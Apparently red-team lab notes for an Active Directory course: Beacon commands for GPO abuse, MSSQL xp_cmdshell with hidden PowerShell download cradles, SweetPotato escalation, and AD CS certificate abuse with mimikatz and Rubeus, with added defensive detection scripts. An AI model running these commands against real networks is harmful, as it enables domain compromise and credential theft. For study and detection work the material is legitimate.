GPOs

modify existing GPOs

search for writable GPOs

beacon> powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Resolve the GPO name and principal

beacon> powershell Get-DomainGPO -Identity "CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" | select displayName, gpcFileSysPath
 
# Who can modify it?
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
 
# what does it apply to? (in this case an OU)
beacon> powershell Get-DomainOU -GPLink "{5059FAC1-5E94-4361-95D3-3BB235A23928}" | select distinguishedName
 
# which computers are in the OU?
beacon> powershell Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName

Now alter the GPO using SharpGPOAbuse:

beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\dns_x64.exe" --GPOName "Vulnerable GPO"

The share was found with beacon> powershell Find-DomainShare -CheckShareAccess, but the script could be stored anywhere the target computer has access to.

Search for who can create a new group policy:

beacon> powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Which OUs can this be linked against?

beacon> powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl
 
# and resolve the SecurityIdentifier to a principal
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

Using the PowerShell RSAT GroupPolicy module

# is RSAT installed?
beacon> powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
 
# create a new GPO
beacon> powershell New-GPO -Name "Evil GPO"
 
# add something to autorun
beacon> powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns_x64.exe" -Type ExpandString
 
# apply the new GPO
beacon> powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"
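From the defender's side, both paths above (editing an existing GPO's content or creating and linking a new one) leave directory-service change events on the domain controllers. The following is an added example, not part of the original notes: it classifies constructed Security log records shaped like events 5136 (object modified) and 5137 (object created) and flags GPO creation, content changes and gPLink changes made by anyone outside an allowlist. The allowlist, the account names and the new-GPO GUID placeholder are constructed for this example; the existing GPO GUID and OU are the ones from the notes.

```python
"""Detect GPO creation, modification and linking by unexpected principals.

Added example, not part of the original notes. It assumes Security log
events 5136 (directory service object modified) and 5137 (object created)
are collected from the domain controllers; the records below are
constructed samples whose fields mirror those events' data fields.
"""
from dataclasses import dataclass
from typing import List, Tuple

# Principals expected to edit Group Policy (constructed for this example).
ALLOWED_GPO_EDITORS = {"DEV\\gpoadmin", "DEV\\Administrator"}

# Attributes rewritten when a GPO's content changes; gPLink changes where it applies.
GPO_CONTENT_ATTRS = {
    "gPCFileSysPath",
    "versionNumber",
    "gPCMachineExtensionNames",
    "gPCUserExtensionNames",
}
LINK_HOLDERS = {"organizationalUnit", "domainDNS", "site"}


@dataclass(frozen=True)
class DsEvent:
    event_id: int        # 5136 = modified, 5137 = created
    subject: str         # SubjectDomainName\SubjectUserName
    object_class: str    # ObjectClass
    object_dn: str       # ObjectDN
    attribute: str = ""  # AttributeLDAPDisplayName (5136 only)


def classify(ev: DsEvent) -> str:
    """Return the rule name an event trips, or '' when it is benign."""
    if ev.subject in ALLOWED_GPO_EDITORS:
        return ""
    if ev.object_class == "groupPolicyContainer":
        if ev.event_id == 5137:
            return "gpo-created"
        if ev.event_id == 5136 and ev.attribute in GPO_CONTENT_ATTRS:
            return "gpo-modified"
    if ev.event_id == 5136 and ev.attribute == "gPLink" and ev.object_class in LINK_HOLDERS:
        return "gpo-linked"
    return ""


def find_gpo_abuse(events: List[DsEvent]) -> List[Tuple[str, str, str]]:
    """Return (rule, subject, object_dn) for every event that trips a rule."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append((rule, ev.subject, ev.object_dn))
    return hits


# Constructed sample events. The GPO GUID and OU are the ones from the notes.
EXISTING_GPO = "CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io"
WORKSTATIONS_OU = "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"
SAMPLE_EVENTS = [
    # legitimate edit by an allowed admin: ignored
    DsEvent(5136, "DEV\\gpoadmin", "groupPolicyContainer", EXISTING_GPO, "versionNumber"),
    # content of an existing GPO rewritten by a normal user
    DsEvent(5136, "DEV\\bfarmer", "groupPolicyContainer", EXISTING_GPO, "gPCFileSysPath"),
    # brand-new GPO object created by a normal user (GUID is a placeholder)
    DsEvent(5137, "DEV\\bfarmer", "groupPolicyContainer",
            "CN={NEW-GPO-GUID-PLACEHOLDER},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io"),
    # gPLink on the Workstations OU changed by a normal user
    DsEvent(5136, "DEV\\bfarmer", "organizationalUnit", WORKSTATIONS_OU, "gPLink"),
    # unrelated attribute change: ignored
    DsEvent(5136, "DEV\\bfarmer", "user", "CN=bfarmer,CN=Users,DC=dev,DC=cyberbotic,DC=io", "description"),
]

if __name__ == "__main__":
    for rule, who, dn in find_gpo_abuse(SAMPLE_EVENTS):
        print(f"{rule:13} {who:16} {dn}")
```

The allowlist is the weak point of this rule: in practice it should be derived from the ACLs the notes enumerate (who actually holds WriteProperty/CreateChild on the policies container and gPLink on OUs), so that a principal which gained those rights unexpectedly is still caught.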

MSSQL Servers

Tools:

find and enumerate SQL Servers

beacon> powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
 
# get instances within domain (searches for SPNs)
beacon> powershell Get-SQLInstanceDomain
 
# can we connect to the database?
beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
 
# get more information about database
beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"

If there are multiple SQL servers available, chain these commands to automate the enumeration:

beacon> powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

Check which user we are on the server and what access it has

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami

Users need the public privilege to perform this enumeration; we can search AD for potential usernames that might have that right:

beacon> powershell Get-DomainGroup -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername }

Or attack the MSSQL service account itself (mssql_svc), e.g. through Kerberoasting.

Query the database

beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select @@servername"
 
beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m query -o "select @@servername"
 
Other clients:
  • mssqlclient.py through proxychains: proxychains mssqlclient.py -windows-auth DEV/bfarmer@10.10.122.25
  • HeidiSQL through Proxifier (on Windows)

MSSQL impersonation

MS SQL impersonation, or context switching, is a feature that allows the executing user to assume the permissions of another user without needing to know their password. One handy use case for the feature is to allow administrators to impersonate a user for testing purposes, e.g. a user is having a problem and they want to rule out permissions as the cause.

SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'; -- note grantee_principal_id and grantor_principal_id
 
-- match those IDs
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;

SQLRecon’s impersonate module also does this for us:

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate

Execute commands as another user:

EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USER;

Or again use SQLRecon for this:

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEV\mssql_svc

MSSQL Command Execution

Using xp_cmdshell

beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults

If this fails, enumerate and enable xp_cmdshell from a normal SQL client:

SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
 
sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Combine this to get a connection to a Beacon:

# prepare download cradle
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
 
beacon> rportfwd 8080 127.0.0.1 80

Start the exploit:

EXEC xp_cmdshell 'powershell -w hidden -c "iex (new-object net.webclient).downloadstring("""http://wkstn-2:8080/b""")"';

And finally link to the new Beacon.

MSSQL linked servers

-- find linked servers
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
 
-- run a query on the linked server
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
 
-- enable xp_cmdshell on the linked server (EXEC ... AT requires rpcout to be enabled on the link)
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
 
# or crawl the links automatically with PowerUpSQL
beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"
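Whether xp_cmdshell is switched on directly or through a link with EXEC ... AT, the server whose configuration changes writes the same line to its ERRORLOG: "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install." The following is an added example, not part of the original notes, that parses constructed ERRORLOG lines in that format and flags the enabling of options that lead to OS command execution, including the "show advanced options" followed by "xp_cmdshell" sequence the enable steps above produce. Timestamps, spids and the watched-option list are constructed; the message format is SQL Server's own.

```python
"""Flag dangerous SQL Server configuration changes in the ERRORLOG.

Added example, not part of the original notes. When sp_configure changes an
option, SQL Server logs
  "Configuration option '<name>' changed from <old> to <new>. Run the
   RECONFIGURE statement to install."
The log lines below are constructed samples in that format.
"""
import re
from typing import Dict, List

# Options whose enabling normally precedes OS command execution from T-SQL
# (constructed watchlist; extend to taste).
WATCHED_OPTIONS = {
    "xp_cmdshell",
    "ole automation procedures",
    "clr enabled",
    "ad hoc distributed queries",
}

# Timestamp, spid, option name and old/new values as they appear in the ERRORLOG.
CONFIG_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+spid(?P<spid>\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def parse_config_changes(lines: List[str]) -> List[Dict[str, str]]:
    """Extract every sp_configure change recorded in the given ERRORLOG lines."""
    changes = []
    for line in lines:
        m = CONFIG_LINE.match(line)
        if m:
            changes.append(m.groupdict())
    return changes


def find_enabled_dangerous_options(lines: List[str]) -> List[Dict[str, str]]:
    """Return the changes that switched a watched option from off to on."""
    return [
        c for c in parse_config_changes(lines)
        if c["option"].lower() in WATCHED_OPTIONS and c["old"] == "0" and c["new"] != "0"
    ]


def sessions_with_prep(lines: List[str]) -> List[str]:
    """spids that turned on 'show advanced options' and then a watched option,
    the exact two-step sequence the enable commands in the notes produce."""
    advanced_on = set()
    suspicious: List[str] = []
    for c in parse_config_changes(lines):
        name = c["option"].lower()
        if name == "show advanced options" and c["new"] != "0":
            advanced_on.add(c["spid"])
        elif name in WATCHED_OPTIONS and c["new"] != "0" and c["spid"] in advanced_on:
            if c["spid"] not in suspicious:
                suspicious.append(c["spid"])
    return suspicious


# Constructed ERRORLOG excerpt (timestamps and spids are invented).
SAMPLE_ERRORLOG = [
    "2024-03-04 10:15:02.11 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-03-04 10:15:02.14 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-03-04 10:20:40.90 spid61      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.",
    "2024-03-04 10:31:17.02 spid70      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
    "2024-03-04 10:32:00.00 spid70      Starting up database 'tempdb'.",
]

if __name__ == "__main__":
    for c in find_enabled_dangerous_options(SAMPLE_ERRORLOG):
        print(f"{c['ts']} spid{c['spid']} enabled {c['option']}")
    print("sessions with the advanced-options prep step:", sessions_with_prep(SAMPLE_ERRORLOG))
```

Because a linked-server hop changes the configuration of the remote server, the line lands in the remote server's ERRORLOG while the interactive session sits on the first one; centralising ERRORLOGs (or using SQL Server Audit on SERVER_OPERATION_GROUP) is what makes the hop visible.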

Execute a Beacon on the linked server through the initial MSSQL server

# add new download cradle for sql server
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
beacon> rportfwd 8080 127.0.0.1 80

Execute an encoded SQL query that downloads the payload through the SQL link:

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGIAJwApAA==''')

Link to the new Beacon.

MSSQL privilege escalation

TODO: research

Check whether the SQL Server service is running as SYSTEM or holds SeImpersonatePrivilege:

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges

In a nutshell, this privilege allows the user to impersonate a token that it is able to get a handle to. However, since this account is not a local admin, it can't just get a handle to a higher-privileged process (e.g. SYSTEM) already running on the machine. A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it is trying to authenticate.

beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="

Active Directory Certificate Services

  • Used for PKI

First search for AD CS CAs:

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas

Use vulnerable templates

Find vulnerable templates:

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable

In this case we can request a certificate for any domain user:

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

Copy the whole certificate (both the private key and the certificate) and save it to cert.pem on Ubuntu WSL. Then use the provided openssl command to convert it to PFX format.

ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0

Get a TGT for the user using the certificate ("pass123" was given as the password during the openssl export):

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap
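What makes the request above work is a template that lets the enrollee supply the subject and that carries a client-authentication EKU; what gives it away afterwards is an issued certificate whose SAN names a different account than the one that enrolled. The following is an added example, not part of the original notes or of Certify: it audits a constructed export of a CA's issued certificates and template settings for exactly those two conditions. The record and field names are this example's own, not a certutil schema, and the template-risk check is a simplification (it does not model who holds enrolment rights, which Certify also evaluates).

```python
"""Audit issued certificates for requester/SAN mismatches and risky templates.

Added example, not part of the original notes. It assumes an export of the
CA's issued-certificate database with, per request, the requester, the
template and the UPN carried in the certificate's subject alternative name,
plus each template's enrolment settings. Records below are constructed.
"""
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple

CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"


@dataclass(frozen=True)
class Template:
    name: str
    enrollee_supplies_subject: bool   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set
    ekus: FrozenSet[str]
    requires_manager_approval: bool


@dataclass(frozen=True)
class IssuedCert:
    request_id: int
    requester: str          # DOMAIN\sAMAccountName that submitted the request
    template: str
    san_upn: Optional[str]  # UPN from the SAN extension, if present


def template_allows_impersonation(t: Template) -> bool:
    """Enrollee picks the subject, the cert can log on as that subject, and
    nobody has to approve it: the combination to treat as a finding."""
    return (t.enrollee_supplies_subject
            and CLIENT_AUTH_EKU in t.ekus
            and not t.requires_manager_approval)


def risky_templates(templates: List[Template]) -> List[str]:
    return [t.name for t in templates if template_allows_impersonation(t)]


def san_mismatch(cert: IssuedCert) -> bool:
    """True when the SAN names someone other than the account that enrolled.
    Trailing '$' is stripped so machine accounts compare with their host UPNs."""
    if not cert.san_upn:
        return False
    requester = cert.requester.split("\\")[-1].rstrip("$").lower()
    san_user = cert.san_upn.split("@")[0].rstrip("$").lower()
    return requester != san_user


def audit(certs: List[IssuedCert], templates: List[Template]) -> List[Tuple[int, str]]:
    """Return (request_id, reason) pairs; a request can trip both reasons."""
    by_name = {t.name: t for t in templates}
    findings = []
    for c in certs:
        if san_mismatch(c):
            findings.append((c.request_id, "san-mismatch"))
        t = by_name.get(c.template)
        if t and template_allows_impersonation(t):
            findings.append((c.request_id, "risky-template"))
    return findings


# Constructed templates: CustomUser mirrors the weak template in the notes,
# User and Machine are the normal built-in shapes.
TEMPLATES = [
    Template("CustomUser", True, frozenset({CLIENT_AUTH_EKU, "1.3.6.1.5.5.7.3.4"}), False),
    Template("User", False, frozenset({CLIENT_AUTH_EKU, "1.3.6.1.5.5.7.3.4"}), False),
    Template("Machine", False, frozenset({CLIENT_AUTH_EKU, "1.3.6.1.5.5.7.3.1"}), False),
]

# Constructed issuance records (request IDs invented).
SAMPLE_CERTS = [
    IssuedCert(1001, "DEV\\bfarmer", "CustomUser", "nlamb@dev.cyberbotic.io"),   # someone else's UPN
    IssuedCert(1002, "DEV\\nlamb", "User", "nlamb@dev.cyberbotic.io"),           # own certificate
    IssuedCert(1003, "DEV\\WKSTN-1$", "Machine", "WKSTN-1$@dev.cyberbotic.io"),  # machine, own UPN
]

if __name__ == "__main__":
    print("risky templates:", risky_templates(TEMPLATES))
    for rid, reason in audit(SAMPLE_CERTS, TEMPLATES):
        print(f"request {rid}: {reason}")
```

The mismatch check is the one to run retroactively: a certificate issued this way stays valid until it expires or is revoked, so the CA database, not just live events, is the place to look.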

NTLM relay to AD CS HTTP endpoints

AD CS supports HTTP enrolment methods and even includes a GUI. This endpoint is usually found at http[s]://<hostname>/certsrv.

An important aspect to be aware of is that you cannot relay NTLM authentication back to the originating machine. We therefore wouldn't be able to relay a DC to a CA if those services were running on the same machine. This is indeed the case in the RTO lab, as each CA is running on a DC.

To achieve this, we need:

  • PortBender on Workstation 2 to capture traffic on port 445 and redirect it to port 8445.
  • A reverse port forward to forward traffic hitting port 8445 to the team server on port 445.
  • A SOCKS proxy for ntlmrelayx to send traffic back into the network.

attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

Force authentication:

beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

Use the S4U2Self trick to get a TGS and move laterally.

See also: ADCS and PetitPotam NTLM Relay into Golden Ticket

Check existing certificates for persistence

Use Seatbelt to enumerate the certificates stored on the host (make sure the certificate can be used for client authentication):

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates

Export the certificate:

beacon> mimikatz crypto::certificates /export

You can sync them through: View → Downloads

ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0

Use Rubeus to ask for a TGT; the password will be "mimikatz":

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /nowrap

If the user has no certificate, we can request one with Certify:

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User

The same can be done with machine accounts:

beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
 
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
 
# again, we can request one through Certify
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine